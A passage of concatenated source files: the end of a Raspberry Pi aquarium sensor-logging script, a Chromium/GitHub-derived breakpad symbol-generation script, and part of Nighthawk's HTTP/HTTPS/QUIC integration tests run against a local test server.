    print "COULD NOT CONNECT TO HISTORY DATABASE"


def cleanup():
    # Release GPIO pins and the hot DB connection on shutdown.
    GPIO.cleanup()
    print "GPIO Cleanup"
    hotconn.close()
    print "Database Connection Closed"
    print "Programing Terminated Successfully"


def db_generatetables():
    # Create the "tank" table (hot DB) and "topoff"/"waterchange" tables
    # (history DB) if they do not already exist.
    try:
        cursor_hot = hotconn.cursor()
        time.sleep(1)
        cursor_hot.execute('''
            CREATE TABLE IF NOT EXISTS tank(
            id INTEGER PRIMARY KEY, ph TEXT, temp TEXT, sump TEXT)
        ''')
        time.sleep(1)
        hotconn.commit()
        print "TABLE TANK COMMITTED IN HOT DATABASE"
    except:
        print "SHITS FUCKED YO - TABLE TANK FAILED TO COMMIT IN HOT DATABASE"
    try:
        # CREATING TOPOFF TABLE
        cursor_hist = histconn.cursor()
        time.sleep(1)
        cursor_hist.execute('''
            CREATE TABLE IF NOT EXISTS topoff(
            id INTEGER PRIMARY KEY, time TEXT, amount TEXT)
        ''')
        # CREATING WATERCHANGE TABLE
        print "TABLE WATERCHANGE COMMITTED IN HOT DATABASE"
        time.sleep(1)
        cursor_hist.execute('''
            CREATE TABLE IF NOT EXISTS waterchange(
            id INTEGER PRIMARY KEY, time TEXT, amount TEXT)
        ''')
        time.sleep(1)
        histconn.commit()
        print "TABLES COMMITTED IN HIST DATABASE"
    except:
        print "SHITS FUCKED YO - TABLES IN HIST DB FAILED TO COMMIT"


time.sleep(1)
db_generatetables()
# cleartable()
time.sleep(1)
# Seed row id=1 that the sensor threads UPDATE in place.
cursor_hot = hotconn.cursor()
cursor_hot.execute('''INSERT INTO tank(ph, temp, sump)
                  VALUES(?,?,?)''', ("NULL", "NULL", "NULL"))
hotconn.commit()
time.sleep(1)


def distancesump():
    # Thread loop: pulse the ultrasonic trigger, time the echo (5 s timeout),
    # convert the pulse to centimetres and write it to the DB + sumprrd.
    global sumprrd
    noprint = 0  # set when the echo timed out; skips one DB write
    while x < 100:
        timeoutstart = time.time()
        timeoutstart = timeoutstart + 5
        GPIO.output(GPIO_OUT_sumptrig, False)
        time.sleep(1)
        GPIO.output(GPIO_OUT_sumptrig, True)
        time.sleep(0.00001)  # 10 us trigger pulse
        GPIO.output(GPIO_OUT_sumptrig, False)
        while GPIO.input(GPIO_IN_sumpecho) == 0:
            pulse_start = time.time()
            if time.time() > timeoutstart:
                break
        while GPIO.input(GPIO_IN_sumpecho) == 1:
            pulse_end = time.time()
            if time.time() > timeoutstart:
                noprint = 1
                break
        # 17150 = speed of sound / 2 in cm/s; round-trip -> one-way distance.
        pulse_duration = pulse_end - pulse_start
        instantdistance = pulse_duration * 17150
        instantdistance = round(instantdistance, 2)
        distancestring = str(instantdistance)
        try:
            if noprint < 1:
                hotconn.execute(
                    "UPDATE tank SET sump = ? WHERE id = ?", (distancestring, 1))
                hotconn.commit()
                sumprrd = distancestring
            else:
                noprint = 0
        except:
            print "\033[1;31mSUMP DISTANCE WRITE SQL ERROR\033[1;0m"
    return instantdistance


def read_temp_raw():  # **TEMP**
    # Read the raw w1_slave sysfs file for the DS18B20 sensor.
    f = open(device_file, 'r')
    lines = f.readlines()
    f.close()
    return lines


def read_temp():  # **TEMP**
    # Thread loop: wait for a valid CRC ("YES"), parse "t=<milli-degC>",
    # convert to Fahrenheit and write it to the DB + temprrd.
    global temprrd
    while x < 100:
        lines = read_temp_raw()
        while lines[0].strip()[-3:] != 'YES':
            time.sleep(0.2)
            lines = read_temp_raw()
        equals_pos = lines[1].find('t=')
        if equals_pos != -1:
            temp_string = lines[1][equals_pos + 2:]
            temp_c = float(temp_string) / 1000.0
            temp_f = temp_c * 9.0 / 5.0 + 32.0
            temp_f = round(temp_f, 1)
            try:
                temp_f = float(temp_f)
                temp_f = str(temp_f)
                hotconn.execute(
                    "UPDATE tank SET temp = ? WHERE id = ?", (temp_f, 1))
                hotconn.commit()
                temprrd = temp_f
            except:
                print "\033[1;31mTEMP WRITE SQL ERROR\033[1;0m"
        time.sleep(1)
    return temp_f


def read_ph():
    # Thread loop: accumulate serial bytes until '\r', then parse the line as
    # a float pH reading and write it to the DB + phrrd.
    global phrrd
    line = ""
    while x < 100:
        time.sleep(2)
        while True:
            data = ser.read()
            if(data == "\r"):
                try:
                    line = float(line)
                    line = str(line)
                    hotconn.execute(
                        "UPDATE tank SET ph = ? WHERE id = ?", (line, 1))
                    hotconn.commit()
                    phrrd = line
                except:
                    print "\033[1;31mPH SQL WRITE ERROR\033[1;0m"
                line = ""
                break
            else:
                line = line + data


def rrdwrite(ph, temp, sump):
    # Push one (ph, temp, sump) sample into the RRD database and regenerate
    # the graphs via an external script.
    try:
        ph = float(ph)
        ph = str(ph)
        temp = float(temp)
        temp = str(temp)
        sump = float(sump)
        sump = str(sump)
        ret = rrdtool.update(rrd_db, 'N:%s:%s:%s' % (ph, temp, sump))
        time.sleep(.1)
        subprocess.call(
            " python /data/database/creategraphs.py", shell=True)
        if ret:
            print rrdtool.error()
    except Exception as inst:
        # Most commonly hit while a *rrd global is still unset at startup.
        print type(inst)
        print ph + " " + temp + " " + sump


def rrdloop():
    # Thread loop: every 10 s flush the latest sensor values to RRD.
    time.sleep(5)  # give the sensor threads a head start
    global phrrd
    global temprrd
    global sumprrd
    while True:
        try:
            rrdwrite(phrrd, temprrd, sumprrd)
            time.sleep(10)
        except:
            print "RRDLOOP FAILED"
            time.sleep(10)


if __name__ == "__main__":
    try:
        print "\033[1;32mMAIN SENSOR PROGRAM STARTING...\033[1;0m"
        # One daemon thread per sensor plus the RRD flusher.
        b = threading.Thread(target=distancesump)
        c = threading.Thread(target=read_temp)
        d = threading.Thread(target=read_ph)
        e = threading.Thread(target=rrdloop)
        b.daemon = True
        c.daemon = True
        d.daemon = True
        e.daemon = True
        b.start()
        c.start()
        d.start()
        e.start()
        while x < 100:
            time.sleep(5)
    except KeyboardInterrupt:
        print "\033[1;31mKEYBOARD INTERRUPT DETECTED - SHUTTING DOWN\033[1;0m"
        cleanup()
    # Dump the final tank readings before exiting.
    cursor_hot = hotconn.execute("SELECT id, ph, temp, sump from tank")
    for row in cursor_hot:
        print "ID = ", row[0]
        print "pH = ", row[1]
        print "Temp = ", row[2]
        print "Sump = ", row[3], "\n"
    cleanup()
generate_breakpad_symbols.py
#!/usr/bin/env python
# Copyright (c) 2013 GitHub, Inc.
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""A tool to generate symbols for a binary suitable for breakpad.

Currently, the tool only supports Linux, Android, and Mac. Support for other
platforms is planned.
"""

import errno
import optparse
import os
import Queue
import re
import shutil
import subprocess
import sys
import threading

# Default number of worker threads for the symbol-dump queue.
CONCURRENT_TASKS=4


def GetCommandOutput(command):
  """Runs the command list, returning its output.

  Prints the given command (which should be a list of one or more strings),
  then runs it and returns its output (stdout) as a string.

  From chromium_utils.
  """
  devnull = open(os.devnull, 'w')
  proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=devnull,
                          bufsize=1)
  output = proc.communicate()[0]
  return output


def GetDumpSymsBinary(build_dir=None):
  """Returns the path to the dump_syms binary.

  Exits the process if the binary is missing or not executable.
  """
  DUMP_SYMS = 'dump_syms'
  dump_syms_bin = os.path.join(os.path.expanduser(build_dir), DUMP_SYMS)
  if not os.access(dump_syms_bin, os.X_OK):
    print 'Cannot find %s.' % DUMP_SYMS
    sys.exit(1)
  return dump_syms_bin


def FindBundlePart(full_path):
  # Walk up the path until a .dylib/.framework/.app component is found;
  # returns '' when none exists.
  if full_path.endswith(('.dylib', '.framework', '.app')):
    return os.path.basename(full_path)
  elif full_path != '' and full_path != '/':
    return FindBundlePart(os.path.dirname(full_path))
  else:
    return ''


def GetDSYMBundle(options, binary_path):
  """Finds the .dSYM bundle to the binary.

  Falls back to the binary itself when no bundle is found next to it or in
  the build/libchromiumcontent directories.
  """
  if os.path.isabs(binary_path):
    dsym_path = binary_path + '.dSYM'
    if os.path.exists(dsym_path):
      return dsym_path

  filename = FindBundlePart(binary_path)
  search_dirs = [options.build_dir, options.libchromiumcontent_dir]
  if filename.endswith(('.dylib', '.framework', '.app')):
    for directory in search_dirs:
      dsym_path = os.path.join(directory, filename) + '.dSYM'
      if os.path.exists(dsym_path):
        return dsym_path

  return binary_path


def GetSymbolPath(options, binary_path):
  """Finds the .dbg to the binary.

  Returns the binary itself when no .dbg companion exists.
  """
  filename = os.path.basename(binary_path)
  dbg_path = os.path.join(options.libchromiumcontent_dir, filename) + '.dbg'
  if os.path.exists(dbg_path):
    return dbg_path

  return binary_path


def Resolve(path, exe_path, loader_path, rpaths):
  """Resolve a dyld path.

  @executable_path is replaced with |exe_path|
  @loader_path is replaced with |loader_path|
  @rpath is replaced with the first path in |rpaths| where the referenced file
      is found
  """
  path = path.replace('@loader_path', loader_path)
  path = path.replace('@executable_path', exe_path)
  if path.find('@rpath') != -1:
    for rpath in rpaths:
      new_path = Resolve(path.replace('@rpath', rpath), exe_path, loader_path,
                         [])
      if os.access(new_path, os.F_OK):
        return new_path
    return ''
  return path


def GetSharedLibraryDependenciesLinux(binary):
  """Return absolute paths to all shared library dependecies of the binary.

  This implementation assumes that we're running on a Linux system."""
  ldd = GetCommandOutput(['ldd', binary])
  lib_re = re.compile('\t.* => (.+) \(.*\)$')
  result = []
  for line in ldd.splitlines():
    m = lib_re.match(line)
    if m:
      result.append(m.group(1))
  return result


def GetSharedLibraryDependenciesMac(binary, exe_path):
  """Return absolute paths to all shared library dependecies of the binary.

  This implementation assumes that we're running on a Mac system."""
  loader_path = os.path.dirname(binary)
  # First pass: collect the binary's LC_RPATH entries so @rpath references
  # in the second pass can be resolved.
  otool = GetCommandOutput(['otool', '-l', binary]).splitlines()
  rpaths = []
  for idx, line in enumerate(otool):
    if line.find('cmd LC_RPATH') != -1:
      m = re.match(' *path (.*) \(offset .*\)$', otool[idx+2])
      rpaths.append(m.group(1))

  otool = GetCommandOutput(['otool', '-L', binary]).splitlines()
  lib_re = re.compile('\t(.*) \(compatibility .*\)$')
  deps = []
  for line in otool:
    m = lib_re.match(line)
    if m:
      dep = Resolve(m.group(1), exe_path, loader_path, rpaths)
      if dep:
        deps.append(os.path.normpath(dep))
  return deps


def GetSharedLibraryDependencies(options, binary, exe_path):
  """Return absolute paths to all shared library dependecies of the binary."""
  deps = []
  if sys.platform.startswith('linux'):
    deps = GetSharedLibraryDependenciesLinux(binary)
  elif sys.platform == 'darwin':
    deps = GetSharedLibraryDependenciesMac(binary, exe_path)
  else:
    print "Platform not supported."
    sys.exit(1)

  # Keep only dependencies that actually exist on disk.
  result = []
  build_dir = os.path.abspath(options.build_dir)
  for dep in deps:
    if (os.access(dep, os.F_OK)):
      result.append(dep)
  return result


def mkdir_p(path):
  """Simulates mkdir -p."""
  try:
    os.makedirs(path)
  except OSError as e:
    if e.errno == errno.EEXIST and os.path.isdir(path):
      pass
    else: raise


def GenerateSymbols(options, binaries):
  """Dumps the symbols of binary and places them in the given directory.

  Fans the work out over options.jobs daemon worker threads fed by a queue.
  """
  queue = Queue.Queue()
  print_lock = threading.Lock()

  def _Worker():
    while True:
      binary = queue.get()

      if options.verbose:
        with print_lock:
          print "Generating symbols for %s" % binary

      # Prefer the richer debug-info companion when one exists.
      if sys.platform == 'darwin':
        binary = GetDSYMBundle(options, binary)
      elif sys.platform == 'linux2':
        binary = GetSymbolPath(options, binary)

      syms = GetCommandOutput([GetDumpSymsBinary(options.build_dir), '-r', '-c',
                               binary])
      # The first line of dump_syms output identifies the module:
      # "MODULE <os> <arch> <id> <name>" — the id/name become the breakpad
      # symbol-store directory layout <name>/<id>/<name>.sym.
      module_line = re.match("MODULE [^ ]+ [^ ]+ ([0-9A-F]+) (.*)\n", syms)
      output_path = os.path.join(options.symbols_dir, module_line.group(2),
                                 module_line.group(1))
      mkdir_p(output_path)
      symbol_file = "%s.sym" % module_line.group(2)
      f = open(os.path.join(output_path, symbol_file), 'w')
      f.write(syms)
      f.close()

      queue.task_done()

  for binary in binaries:
    queue.put(binary)

  for _ in range(options.jobs):
    t = threading.Thread(target=_Worker)
    t.daemon = True
    t.start()

  queue.join()


def main():
  parser = optparse.OptionParser()
  parser.add_option('', '--build-dir', default='',
                    help='The build output directory.')
  parser.add_option('', '--symbols-dir', default='',
                    help='The directory where to write the symbols file.')
  parser.add_option('', '--libchromiumcontent-dir', default='',
                    help='The directory where libchromiumcontent is downloaded.')
  parser.add_option('', '--binary', default='',
                    help='The path of the binary to generate symbols for.')
  parser.add_option('', '--clear', default=False, action='store_true',
                    help='Clear the symbols directory before writing new '
                         'symbols.')
  parser.add_option('-j', '--jobs', default=CONCURRENT_TASKS, action='store',
                    type='int', help='Number of parallel tasks to run.')
  parser.add_option('-v', '--verbose', action='store_true',
                    help='Print verbose status output.')

  (options, _) = parser.parse_args()

  if not options.symbols_dir:
    print "Required option --symbols-dir missing."
    return 1

  if not options.build_dir:
    print "Required option --build-dir missing."
    return 1

  if not options.libchromiumcontent_dir:
    print "Required option --libchromiumcontent-dir missing."
    return 1

  if not options.binary:
    print "Required option --binary missing."
    return 1

  if not os.access(options.binary, os.X_OK):
    print "Cannot find %s." % options.binary
    return 1

  if options.clear:
    try:
      shutil.rmtree(options.symbols_dir)
    except:
      pass

  # Build the transitive closure of all dependencies.
  binaries = set([options.binary])
  queue = [options.binary]
  exe_path = os.path.dirname(options.binary)
  while queue:
    deps = GetSharedLibraryDependencies(options, queue.pop(0), exe_path)
    new_deps = set(deps) - binaries
    binaries |= new_deps
    queue.extend(list(new_deps))

  GenerateSymbols(options, binaries)

  return 0


if '__main__' == __name__:
  sys.exit(main())
test_integration_basics.py
"""Tests Nighthawk's basic functionality.""" import json import logging import math import os import pytest import subprocess import sys import time from threading import Thread from test.integration.common import IpVersion from test.integration.integration_test_fixtures import ( http_test_server_fixture, https_test_server_fixture, https_test_server_fixture, multi_http_test_server_fixture, multi_https_test_server_fixture, quic_test_server_fixture, server_config, server_config_quic) from test.integration import asserts from test.integration import utility # TODO(oschaaf): we mostly verify stats observed from the client-side. Add expectations # for the server side as well. @pytest.mark.skipif(utility.isSanitizerRun(), reason="Unstable and very slow in sanitizer runs") def test_http_h1(http_test_server_fixture): """Test http1 over plain http. Runs the CLI configured to use plain HTTP/1 against our test server, and sanity checks statistics from both client and server. """ parsed_json, _ = http_test_server_fixture.runNighthawkClient([ http_test_server_fixture.getTestServerRootUri(), "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24" ]) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 1) asserts.assertCounterEqual(counters, "upstream_cx_rx_bytes_total", 3400) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", 500) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 1) global_histograms = http_test_server_fixture.getNighthawkGlobalHistogramsbyIdFromJson(parsed_json) asserts.assertEqual(int(global_histograms["benchmark_http_client.response_body_size"]["count"]), 25) 
asserts.assertEqual(int(global_histograms["benchmark_http_client.response_header_size"]["count"]), 25) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_body_size"]["raw_mean"]), 10) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_header_size"]["raw_mean"]), 97) asserts.assertEqual(int(global_histograms["benchmark_http_client.response_body_size"]["raw_min"]), 10) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_header_size"]["raw_min"]), 97) asserts.assertEqual(int(global_histograms["benchmark_http_client.response_body_size"]["raw_max"]), 10) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_header_size"]["raw_max"]), 97) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_body_size"]["raw_pstdev"]), 0) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_header_size"]["raw_pstdev"]), 0) asserts.assertEqual(len(counters), 12) def _mini_stress_test(fixture, args): # run a test with more rps then we can handle, and a very small client-side queue. # we should observe both lots of successfull requests as well as time spend in blocking mode., parsed_json, _ = fixture.runNighthawkClient(args) counters = fixture.getNighthawkCounterMapFromJson(parsed_json) # We set a reasonably low expectation of 100 requests. We set it low, because we want this # test to succeed on a reasonable share of setups (hopefully practically all). 
MIN_EXPECTED_REQUESTS = 100 asserts.assertCounterEqual(counters, "benchmark.http_2xx", MIN_EXPECTED_REQUESTS) if "--h2" in args: asserts.assertCounterEqual(counters, "upstream_cx_http2_total", 1) else: asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 1) global_histograms = fixture.getNighthawkGlobalHistogramsbyIdFromJson(parsed_json) if "--open-loop" in args: asserts.assertEqual(int(global_histograms["sequencer.blocking"]["count"]), 0) else: asserts.assertGreaterEqual(int(global_histograms["sequencer.blocking"]["count"]), 1) asserts.assertGreaterEqual( int(global_histograms["benchmark_http_client.request_to_response"]["count"]), 1) asserts.assertGreaterEqual(int(global_histograms["benchmark_http_client.latency_2xx"]["count"]), 1) return counters # The mini stress tests below are executing in closed-loop mode. As we guard the pool against # overflows, we can set fixed expectations with respect to overflows and anticipated pending # totals. def test_http_h1_mini_stress_test_with_client_side_queueing(http_test_server_fixture): """Run a max rps test with the h1 pool against our test server, using a small client-side queue.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "999999", "--max-pending-requests", "10", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--simple-warmup" ]) asserts.assertCounterGreaterEqual(counters, "upstream_rq_pending_total", 11) asserts.assertCounterGreaterEqual(counters, "upstream_cx_overflow", 10) def test_http_h1_mini_stress_test_without_client_side_queueing(http_test_server_fixture): """Run a max rps test with the h1 pool against our test server, with no client-side queueing.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "999999", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99" ]) 
asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertNotIn("upstream_cx_overflow", counters) def test_http_h2_mini_stress_test_with_client_side_queueing(http_test_server_fixture): """Run a max rps test with the h2 pool against our test server, using a small client-side queue.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "999999", "--max-pending-requests", "10", "--h2", "--max-active-requests", "1", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--simple-warmup" ]) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_rq_pending_overflow", 10) def test_http_h2_mini_stress_test_without_client_side_queueing(http_test_server_fixture): """Run a max rps test with the h2 pool against our test server, with no client-side queueing.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "999999", "--h2", "--max-active-requests", "1", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99" ]) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertNotIn("upstream_rq_pending_overflow", counters) @pytest.mark.skipif(not utility.isRunningInCircleCi(), reason="Has very high failure rate in local executions.") @pytest.mark.skipif(utility.isSanitizerRun(), reason="Unstable and very slow in sanitizer runs") def test_http_h1_mini_stress_test_open_loop(http_test_server_fixture): """Run an H1 open loop stress test. 
We expect higher pending and overflow counts.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "10000", "--max-pending-requests", "1", "--open-loop", "--max-active-requests", "1", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--simple-warmup" ]) # we expect pool overflows asserts.assertCounterGreater(counters, "benchmark.pool_overflow", 10) @pytest.mark.skipif(not utility.isRunningInCircleCi(), reason="Has very high failure rate in local executions.") @pytest.mark.skipif(utility.isSanitizerRun(), reason="Unstable and very slow in sanitizer runs") def test_http_h2_mini_stress_test_open_loop(http_test_server_fixture): """Run an H2 open loop stress test. We expect higher overflow counts.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "10000", "--max-pending-requests", "1", "--h2", "--open-loop", "--max-active-requests", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--simple-warmup" ]) # we expect pool overflows asserts.assertCounterGreater(counters, "benchmark.pool_overflow", 10) def test_http_h2(http_test_server_fixture): """Test h2 over plain http. Runs the CLI configured to use h2c against our test server, and sanity checks statistics from both client and server. 
""" parsed_json, _ = http_test_server_fixture.runNighthawkClient([ "--h2", http_test_server_fixture.getTestServerRootUri(), "--max-active-requests", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24", "--rps", "100" ]) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http2_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_rx_bytes_total", 1030) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", 403) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 1) asserts.assertEqual(len(counters), 12) def test_http_concurrency(http_test_server_fixture): """Test that concurrency acts like a multiplier.""" parsed_json, _ = http_test_server_fixture.runNighthawkClient([ "--concurrency 4 --rps 100 --connections 1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24", http_test_server_fixture.getTestServerRootUri() ]) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) # Quite a loose expectation, but this may fluctuate depending on server load. # Ideally we'd see 4 workers * 5 rps * 5s = 100 requests total asserts.assertCounterEqual(counters, "benchmark.http_2xx", 100) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 4) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h1(https_test_server_fixture): """Test h1 over https. Runs the CLI configured to use HTTP/1 over https against our test server, and sanity checks statistics from both client and server. 
""" parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--connections", "1", "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 1) asserts.assertCounterEqual(counters, "upstream_cx_rx_bytes_total", 3400) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", 500) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "ssl.ciphers.ECDHE-RSA-AES128-GCM-SHA256", 1) asserts.assertCounterEqual(counters, "ssl.curves.X25519", 1) asserts.assertCounterEqual(counters, "ssl.handshake", 1) asserts.assertCounterEqual(counters, "ssl.sigalgs.rsa_pss_rsae_sha256", 1) asserts.assertCounterEqual(counters, "ssl.versions.TLSv1.2", 1) asserts.assertCounterEqual(counters, "default.total_match_count", 1) asserts.assertEqual(len(counters), 17) server_stats = https_test_server_fixture.getTestServerStatisticsJson() asserts.assertEqual( https_test_server_fixture.getServerStatFromJson(server_stats, "http.ingress_http.downstream_rq_2xx"), 25) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h2(https_test_server_fixture): """Test http2 over https. Runs the CLI configured to use HTTP/2 (using https) against our test server, and sanity checks statistics from both client and server. 
""" parsed_json, _ = https_test_server_fixture.runNighthawkClient([ "--h2", https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24", "--max-active-requests", "1" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http2_total", 1) # Through emperical observation, 1030 has been determined to be the minimum of bytes # we can expect to have received when execution has stopped. asserts.assertCounterGreaterEqual(counters, "upstream_cx_rx_bytes_total", 1030) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", 403) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "ssl.ciphers.ECDHE-RSA-AES128-GCM-SHA256", 1) asserts.assertCounterEqual(counters, "ssl.curves.X25519", 1) asserts.assertCounterEqual(counters, "ssl.handshake", 1) asserts.assertCounterEqual(counters, "ssl.sigalgs.rsa_pss_rsae_sha256", 1) asserts.assertCounterEqual(counters, "ssl.versions.TLSv1.2", 1) asserts.assertCounterEqual(counters, "default.total_match_count", 1) asserts.assertEqual(len(counters), 17) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h2_multiple_connections(https_test_server_fixture): """Test that the experimental h2 pool uses multiple connections. The burst we send ensures we will need 10 connections right away, as we limit max active streams per connection to 1 by setting the experimental flag to use multiple h2 connections. 
""" parsed_json, _ = https_test_server_fixture.runNighthawkClient([ "--h2", https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--max-active-requests", "10", "--max-pending-requests", "10", "--max-concurrent-streams", "1", "--burst-size", "10" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 100) # Empirical observation shows we may end up creating more then 10 connections. # This is stock Envoy h/2 pool behavior. asserts.assertCounterGreaterEqual(counters, "upstream_cx_http2_total", 10) def test_h3_quic(quic_test_server_fixture): """Test http3 quic. Runs the CLI configured to use HTTP/3 Quic against our test server, and sanity checks statistics from both client and server. """ parsed_json, _ = quic_test_server_fixture.runNighthawkClient([ "--protocol http3", quic_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24", "--max-active-requests", "1", # Envoy doesn't support disabling certificate verification on Quic # connections, so the host in our requests has to match the hostname in # the leaf certificate. "--request-header", "Host:www.lyft.com" ]) counters = quic_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http3_total", 1) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 1) def _do_tls_configuration_test(https_test_server_fixture, cli_parameter, use_h2): """Test with different ciphers. 
For a given choice of (--tls-context, --transport-socket) x (H1, H2), run a series of traffic tests with different ciphers. Args: https_test_server_fixture: pytest.fixture that controls a test server and client cli_parameter: string, --tls-context or --transport-socket use_h2: boolean, whether to pass --h2 """ if cli_parameter == "--tls-context": json_template = "{common_tls_context:{tls_params:{cipher_suites:[\"-ALL:%s\"]}}}" else: json_template = "%s%s%s" % ( "{name:\"envoy.transport_sockets.tls\",typed_config:{", "\"@type\":\"type.googleapis.com/envoy.extensions.transport_sockets.tls.v3.UpstreamTlsContext\",", "common_tls_context:{tls_params:{cipher_suites:[\"-ALL:%s\"]}}}}") for cipher in [ "ECDHE-RSA-AES128-SHA", "ECDHE-RSA-CHACHA20-POLY1305", ]: parsed_json, _ = https_test_server_fixture.runNighthawkClient( (["--protocol", "http2"] if use_h2 else []) + [ "--duration", "10", "--termination-predicate", "benchmark.http_2xx:0", cli_parameter, json_template % cipher, https_test_server_fixture.getTestServerRootUri() ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "ssl.ciphers.%s" % cipher, 1) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h1_tls_context_configuration(https_test_server_fixture): """Test that specifying tls cipher suites works with the h1 pool.""" _do_tls_configuration_test(https_test_server_fixture, "--tls-context", use_h2=False) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h1_transport_socket_configuration(https_test_server_fixture): """Test that specifying tls cipher suites via transport socket works with the h1 pool.""" _do_tls_configuration_test(https_test_server_fixture, "--transport-socket", use_h2=False) @pytest.mark.parametrize('server_config', 
